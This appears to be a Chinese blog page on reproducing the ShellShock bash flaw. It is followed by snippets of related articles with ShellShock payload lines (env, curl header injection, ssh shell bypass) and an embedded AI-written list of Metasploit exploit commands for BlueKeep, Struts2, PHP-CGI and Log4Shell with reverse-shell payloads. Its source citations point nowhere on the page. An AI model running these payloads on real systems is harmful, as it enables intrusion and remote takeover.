关于ShellShock漏洞的利用过程和原理解析

最新推荐文章于 2025-07-05 12:29:01 发布
原创 最新推荐文章于 2025-07-05 12:29:01 发布 · 8.7k 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#WEB渗透测试 #漏洞 #bash

本文详细介绍了ShellShock漏洞的利用过程,包括检查bash版本、利用漏洞获取root权限、安装GCC编译利用代码,以及漏洞原理的简单解析。通过环境变量的特殊构造,bash在读取时执行了未授权的代码,导致权限提升。

0x00

今天本是应该休息和打LOL的日子,但是我那个敬业的舍友非要拿python写个跟Siri类似的东西。好吧我也来学习学习

晚上来研究下这个14年出现并且自家产品能防护住的漏洞---ShellShock
这是Bashshell中的一个漏洞,使得攻击者能在小于等于4.1版本的Bash上进行任意代码执行
 
实验环境:Centos 6.7

实验目的:获取root权限


0x01
先检查了下自己的bash版本是不是小于4.1
如果不是则通过下边的步骤进行修改
#wget http://labfile.oss.aliyuncs.com/bash-4.1.tar.gz
#tar xf bash-4.1.tar.gz
#cd bash-4.1

最低0.47元/天 解锁文章
详解ShellShock 漏洞复现原理,内附ShellShock的修复方法
Anprou的博客
05-31 7115
Shellshock原理利用Bash在导入环境变量函数时候的漏洞,启动Bash的时候,它不但会导入这个函数,而且也会把函数定义后面的命令执行。
Shellshock漏洞复现
weixin_44283446的博客
03-23 5170
Shellshock漏洞复现bash说明漏洞原理漏洞复现环境说明漏洞条件漏洞复现 bash说明 Bash是Unix shell的一种。1989年发布第一个正式版本,原先是计划用在GNU操作系统上,但能运行于大多数类Unix系统的操作系统之上。 漏洞原理 目前的Bash使用的环境变量是通过函数名称来调用的,导致漏洞出问题的是以”(){”开头定义的环境变量在命令env中解析成函数后,Bash执行未退出,而是继续解析并执行shell命令,而其核心的原因在于在输入的过滤中没有严格限制边界,也没有做出合法化的参
SEED实验系列:ShellShock 攻击实验
weixin_33897722的博客
04-21 787
2019独角兽企业重金招聘Python工程师标准>>> ...
ShellShock漏洞原理分析
weixin_34037515的博客
05-27 508
9月24日,广泛存在于Linux的bash漏洞曝光。因为此漏洞可以执行远程命令,所以极为危。危害程度可能超过前段时间的心脏流血漏洞漏洞编号CVE-2014-6271,以及打了补丁之后被绕过的CVE-2014-7169,又称ShellShock漏洞漏洞起因: 要是用一句话概括这个漏洞,就是代码数据没有正确区分。 此次漏洞很像SQL注入,通过特...
shellshock漏洞
m0_57836225的博客
09-10 648
攻击者可以通过向受影响的系统发送恶意构造的环境变量来触发这个漏洞,从而执行任意代码。4. 执行恶意代码:目标系统上的 Bash 在处理请求时,由于漏洞存在,会错误地执行恶意环境变量中的代码。不同的操作系统有不同的更新方法,通常可以通过系统的软件包管理器进行更新。2. 安全配置:对系统的环境变量设置进行严格的审查限制。避免使用来自不可信来源的环境变量,并且对输入到系统中的环境变量进行过滤验证。3. 访问控制:加强对系统的访问控制,限制不必要的用户进程对系统的访问权限。
漏洞分析——shellshock实验
郭同学如是说
04-15 2954
Shellshock Attack Lab 前导知识 SHELL:命令行界面的解释器 Linux下常见Shell: Bourne Again Shell(/bin/bash) C Shell(/usr/bin/csh) K Shell(/usr/bin/ksh) Bourne Again Shell(/bin/bash) 查看目前使用的shell是否是/bin/bash: seed@ubuntu:/usr/lib/cgi-bin$ echo $SHELL /bin/bash vim编
Bash 破壳漏洞Shellshock (CVE-2014-6271)复现
Makboli的博客
08-23 1844
Bash 破壳漏洞Shellshock (CVE-2014-6271)复现
Shellshock(破壳)系列漏洞简要分析及检测
Traxer的学习之路
03-13 4856
1.漏洞简介2.POC验证2.1 CVE 2014-6271最开始的shell测试脚本如下,主要的代码是第五行,它先使用env命令将() { :;}; echo vulnerable赋值给环境变量x,随后启动一个新的bash进程并执行命令echo test,并将错误信息重定向到null,再查找有无’vulnerable’这个字符串输出,如果输出成功则表示存在漏洞:#!/bin/bash EXITCO
37、UNIX系统安全漏洞利用技术解析
最新发布
plant的博客
07-05 28
本文深入解析UNIX系统中多个关键服务的安全漏洞利用技术,涵盖EBBSHAVE对Sparc Solaris RPC服务的攻击原理与调试方法、R-services(rsh、rlogin、rexec)的远程访问漏洞利用、SNMP协议的社区名称安全隐患及信息探测工具使用,以及CUPS打印系统的命令注入风险。同时,针对各漏洞提供详细的安全防护建议,帮助系统管理员安全研究人员全面了解UNIX系统潜在威胁并采取有效防御措施。
【靶场补充】项目十二补充(shellshock原理
人间体佐菲的博客
09-12 788
shellshock
shellshock漏洞利用
我的学习笔记
02-28 1238
echo $shell #查看当前用户的shell env x='() { :;}; echo vulnerable' bash -c "echo this is a test" #定义了一个名字叫x的变量,内容时单引号内的。 exploit:curl -H 'x: () { :;};a='/bin/mkdir /var/www/.ssh';echo ...
shellshock_Shellshock Bash漏洞
culin0274的博客
08-11 280
shellshockShellshock is a vulnerability that has been discovered in Bash, which you are likely to know as the command line interface that you use to manage your Linux server through SSH. On a compromi...
Linux Shell Shock漏洞利用实战
单核CPU的小朋友的博客
03-01 5477
漏洞介绍: Shellshock,又称Bashdoor,是在Unix中广泛使用的Bash shell中的一个安全漏洞,首次于2014年9月24日公开。许多互联网守护进程,如网页服务器,使用bash来处理某些命令,从而允许攻击者在易受攻击的Bash版本上执行任意代码。这可使攻击者在未授权的情况下访问计算机系统。——摘自维基百科 漏洞实验环境搭建: 1、 以root权限安装4.1版本的bansh。下载...
【安全】Shellshock漏洞
01-30 752
Shellshock利用了linux环境变量解析问题,进而可以进行针对正常应用启动shell时进行劫持。通过该漏洞,可以实现CGI环境下的RCE,以及针对特权应用的提权。 可以简单理解为,当环境变量可控时,均存在攻击场景。如此看来,该漏洞危害极大,攻击场景非常广。
Bash Bug(破壳漏洞Shellshock- CVE-2014-6271
HaSaKing的博客
05-28 1300
破壳漏洞是对全球数以百万计的系统构成威胁的严重安全漏洞。通过理解其原理并学习如何检测修补,您可以显著提高自己系统的安全性。始终保持系统软件的最新状态是保护自己免受此类漏洞攻击的关键策略。
linux shellshock漏洞,修复linux bashShellShock系列漏洞
weixin_34515820的博客
05-18 332
检查是否有linux bashShellShock系列漏洞ShellShock系列漏洞包含有CVE-2014-6271CVE-2014-7169CVE-2014-7186CVE-2014-7187CVE-2014-6277CVE-2014-6278检查是否有ShellShock系列漏洞wget --no-check-certificate https://github.com/hannob/...
ShellShock(CVE-2014-6271)
qq_41672971的博客
12-07 585
shellshock
环境变量相关的shellshock攻击
qq_43674956的博客
01-12 698
环境变量 什么是环境变量 环境变量是存储在进程中的一系列动态键值对,它们可以影响进程的行为。 可以通过局部变量envp获取,只能在main函数中使用 也可以用environ全局变量获取 也可以调用getenv(var_name)来获取 这个函数是在environ数组中搜索 也可以使用putenv(),setenv()unsetenv()来改变修改删除环境变量 进程获取环境变量的方式 使用fork()子进程继承父进程的所有环境变量 使用execve()第一个参数是新程序的路径 第二个参数是数组传入新程序的
linux shellshock漏洞,shellshock漏洞分析
weixin_28706923的博客
05-18 408
这是tr0ll2靶机涉及到的东西,先看一下在这个靶机上的过程。我们获取了noob用户的ssh密钥,之后登录却失败了:之后我们输入如下命令:ssh noob@192.168.16.141 -i noob -t '() { :;}; /bin/bash'再次登录,居然成功了:以上就是shellshock攻击,其利用的是bash在导入环境变量函数时候的漏洞,启动bash的时候,它不仅会导入这个函数,也...
除了永恒之蓝,MSF还有哪些经典漏洞利用模块?
07-01
<think>我们正在回答用户关于MetasploitFramework经典漏洞利用模块的问题,除了永恒之蓝(MS17-010)之外,用户希望了解其他经典模块。根据引用[2]引用[3]的内容,我们可以知道Metasploit框架中的漏洞利用模块(exploits)是攻击流程的核心,而payloads、auxiliary等模块则配合使用。因此,我们可以列举一些历史上著名的漏洞利用模块,这些漏洞影响广泛,在Metasploit中也有对应的利用模块。注意:引用[1]提到永恒之蓝漏洞利用时可能出现蓝屏,说明漏洞利用的稳定性可能存在问题,但其他经典模块同样可能存在类似问题。下面列举几个经典漏洞利用模块:1.**CVE-2019-0708 (BlueKeep)**:这是一个影响Windows远程桌面服务(RDP)的严重漏洞,与永恒之蓝类似,可以在无需用户交互的情况下实现远程代码执行。Metasploit中提供了多个利用模块,例如`exploit/windows/rdp/cve_2019_0708_bluekeep_rce`。2.**CVE-2017-0143 (EternalRomance)**:这是SMB协议中的另一个漏洞,属于永恒系列漏洞之一,影响SMBv1。模块路径:`exploit/windows/smb/ms17_010_eternalromance`。3.**CVE-2014-0160 (Heartbleed)**:心脏滴血漏洞,影响OpenSSL。该漏洞允许攻击者读取受保护的内存内容,从而可能获取敏感信息(如私钥)。Metasploit中的模块:`auxiliary/scanner/ssl/openssl_heartbleed`(注意这是一个辅助模块,用于信息泄露,不是直接获取shell利用模块,但后续可以结合获取的信息进行进一步攻击)。4.**CVE-2012-1823 (PHP-CGI漏洞)**:影响PHP的远程代码执行漏洞,模块路径:`exploit/multi/http/php_cgi_arg_injection`。5.**CVE-2010-3333 (Microsoft WordRTF栈溢出漏洞)**:通过恶意RTF文件实现远程代码执行,模块路径:`exploit/windows/fileformat/ms10_087_rtf_pfragments_bof`。6. **CVE-2008-4250 (MS08-067)**:这是另一个经典的WindowsSMB漏洞,在永恒之蓝之前被广泛利用。模块路径:`exploit/windows/smb/ms08_067_netapi`。7.**CVE-2017-8464 (LNK漏洞)**:通过恶意LNK文件实现远程代码执行,模块路径:`exploit/windows/fileformat/cve_2017_8464_lnk_rce`。8.**CVE-2019-19781 (CitrixADC/Netscaler漏洞)**:影响Citrix应用交付控制器网关的漏洞,可导致远程代码执行。模块路径:`exploit/linux/http/citrix_dir_traversal_rce`。9.**CVE-2021-44228 (Log4Shell)**: Log4j2远程代码执行漏洞,影响广泛。模块路径:`exploit/multi/http/log4shell_header_injection`。10.**CVE-2020-1472 (ZeroLogon)**: Netlogon特权提升漏洞,允许攻击者获取域管理员权限。模块路径:`auxiliary/admin/dcerpc/cve_2020_1472_zerologon`(这是一个辅助模块,用于重置域控密码,然后配合其他攻击手段)。注意:以上漏洞利用模块在Metasploit中的路径可能会随着版本更新而变化,使用时请先搜索确认。在回答中,我们按照漏洞的CVE编号名称进行列举,并简要说明漏洞影响模块路径。同时,我们根据引用[2][3]的内容,提醒用户Metasploit模块的分类(如exploit、auxiliary)以及使用注意事项。最后,我们生成相关问题。</think>### Metasploit Framework 经典漏洞利用模块(除永恒之蓝外) Metasploit Framework 包含大量经典漏洞利用模块,以下是影响力较大的案例及其技术原理--- #### **1. CVE-2019-0708 (BlueKeep)** - **漏洞类型**:Windows 远程桌面服务(RDP)远程代码执行 - **危害**:无需用户交互即可获得SYSTEM权限 - **利用模块**: ```bash use exploit/windows/rdp/cve_2019_0708_bluekeep_rce set RHOSTS [目标IP] set PAYLOAD windows/x64/meterpreter/reverse_tcp exploit ``` - **技术特点**:通过畸形RDP协议数据触发内核级内存损坏[^2] - **影响范围**:Windows 7/2008 R2及更早系统 --- #### **2. CVE-2017-5638 (Apache Struts2)** - **漏洞类型**:OGNL表达式注入 - **危害**:通过HTTP头实现远程命令执行 - **利用模块**: ```bash use exploit/multi/http/struts2_content_type_ognl set RHOSTS [目标URL] set TARGETURI /login.action set CMD "whoami" # 直接执行系统命令 exploit ``` - **技术特点**:利用Content-Type头注入恶意OGNL表达式[^3] - **著名案例**:导致Equifax 1.43亿用户数据泄露 --- #### **3. CVE-2014-6271 (Shellshock)** - **漏洞类型**:Bash环境变量注入 - **危害**:通过CGI接口实现系统命令执行 - **利用模块**: ```bash use exploit/multi/http/apache_mod_cgi_bash_env_exec set RHOSTS [目标IP] set TARGETURI /cgi-bin/test.sh exploit ``` - **技术特点**:利用Bash解析函数定义时的代码执行缺陷 - **影响范围**:Unix/Linux系统(2014年影响全球5亿设备) --- #### **4. CVE-2012-1823 (PHP-CGI漏洞)** - **漏洞类型**:PHP-CGI参数注入 - **危害**:通过查询字符串执行系统命令 - **利用模块**: ```bash use exploit/multi/http/php_cgi_arg_injection set RHOSTS [目标IP] set TARGETURI /php-cgi exploit ``` - **技术特点**:利用`?-s`等参数直接暴露源码或执行命令[^2] --- #### **5. CVE-2021-44228 (Log4Shell)** - **漏洞类型**:Log4j JNDI注入 - **危害**:通过日志记录功能实现RCE - **利用模块**: ```bash use exploit/multi/http/log4shell_header_injection set RHOSTS [目标URL] set HTTP_HEADER "User-Agent" # 注入点 set SRVHOST [攻击机IP] exploit ``` - **技术特点**:利用${jndi:ldap://}协议加载远程恶意类 --- ### 漏洞利用模块分类 根据引用[2]的框架定义: 1. **远程利用(exploit)** - 如`exploit/unix/ftp/vsftpd_234_backdoor` 2. **客户端攻击** - 如`exploit/windows/browser/ms10_046_shortcut_icon_dllloader` 3. **辅助扫描(auxiliary)** - 如`auxiliary/scanner/http/tomcat_mgr_login` > **注**:所有利用需遵守法律授权,测试前务必确认目标系统合规性[^1]。 --- ### 相关问题 1. **如何防御BlueKeep漏洞攻击?** 2. **Metasploit中如何检测Apache Struts2漏洞?** 3. **Shellshock漏洞在现代系统中是否仍然有效?** 4. **Log4Shell漏洞利用需要哪些先决条件?**
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值